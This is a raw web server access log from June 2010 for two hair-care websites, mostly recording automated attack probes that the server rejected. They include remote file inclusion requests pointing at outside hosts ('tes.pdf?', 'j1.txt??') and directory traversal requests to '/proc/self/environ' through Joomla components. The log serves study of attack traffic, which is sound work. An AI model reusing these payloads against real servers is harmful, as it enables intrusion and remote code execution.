67.205.67.73 - - [28/Jun/2010:01:11:20 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
209.126.254.119 - - [28/Jun/2010:01:15:22 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "growlonghairfast.com"
209.126.254.119 - - [28/Jun/2010:01:15:22 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:01:15:26 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:01:15:26 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
91.150.221.224 - - [28/Jun/2010:01:19:53 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
91.150.221.224 - - [28/Jun/2010:01:19:54 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
93.96.130.160 - - [28/Jun/2010:01:20:26 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
93.96.130.160 - - [28/Jun/2010:01:20:27 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:01:25:08 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:01:25:09 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:01:25:10 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:28:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:28:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
79.175.165.14 - - [28/Jun/2010:01:29:32 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
79.175.165.14 - - [28/Jun/2010:01:29:32 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.15.198.39 - - [28/Jun/2010:01:31:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:32:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.195.37.176 - - [28/Jun/2010:01:34:36 -0700] "GET /?M=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:34:39 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:34:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:34:39 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
79.175.165.14 - - [28/Jun/2010:01:35:35 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
79.175.165.14 - - [28/Jun/2010:01:35:44 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:36:20 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:01:36:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:01:36:21 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.80.193.38 - - [28/Jun/2010:01:38:27 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.6.03b)" "freehairsecrets.com"
178.63.9.134 - - [28/Jun/2010:01:40:17 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
178.63.9.134 - - [28/Jun/2010:01:40:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
178.63.9.134 - - [28/Jun/2010:01:40:17 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:01:41:35 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:01:41:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:01:41:36 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:41:37 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:41:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:41:37 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [28/Jun/2010:01:44:20 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.198.39 - - [28/Jun/2010:01:44:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.198.39 - - [28/Jun/2010:01:44:21 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:46:09 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:46:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:46:09 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.205.67.73 - - [28/Jun/2010:01:46:16 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:01:46:16 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:01:47:38 -0700] "GET /logs/access_100614.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:01:47:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:01:47:38 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
174.121.216.99 - - [28/Jun/2010:01:49:10 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:49:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:01:49:10 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.15.198.39 - - [28/Jun/2010:01:49:31 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.198.39 - - [28/Jun/2010:01:49:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.198.39 - - [28/Jun/2010:01:49:32 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:01:50:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:01:51:02 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.205.67.73 - - [28/Jun/2010:01:51:46 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:01:51:46 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:01:52:43 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:01:52:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:01:52:44 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
124.115.6.16 - - [28/Jun/2010:01:58:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
216.229.46.44 - - [28/Jun/2010:01:58:44 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
216.229.46.44 - - [28/Jun/2010:01:58:57 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:01:59:16 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /logs/access_100621.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:42 -0700] "GET /logs/access_100621.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:43 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:43 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:43 -0700] "GET /logs/access_100621.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:02:01:43 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:02:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:02:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:02:27 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:02:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:02:27 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.21.189 - - [28/Jun/2010:02:02:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:02:34 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:02:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:02:35 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:02:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:02:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.21.189 - - [28/Jun/2010:02:02:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.21.189 - - [28/Jun/2010:02:03:08 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.21.189 - - [28/Jun/2010:02:03:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.21.189 - - [28/Jun/2010:02:03:08 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:03:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:03:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.21.189 - - [28/Jun/2010:02:03:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:03:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:03:42 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:03:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.176.194 - - [28/Jun/2010:02:03:42 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [28/Jun/2010:02:03:44 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
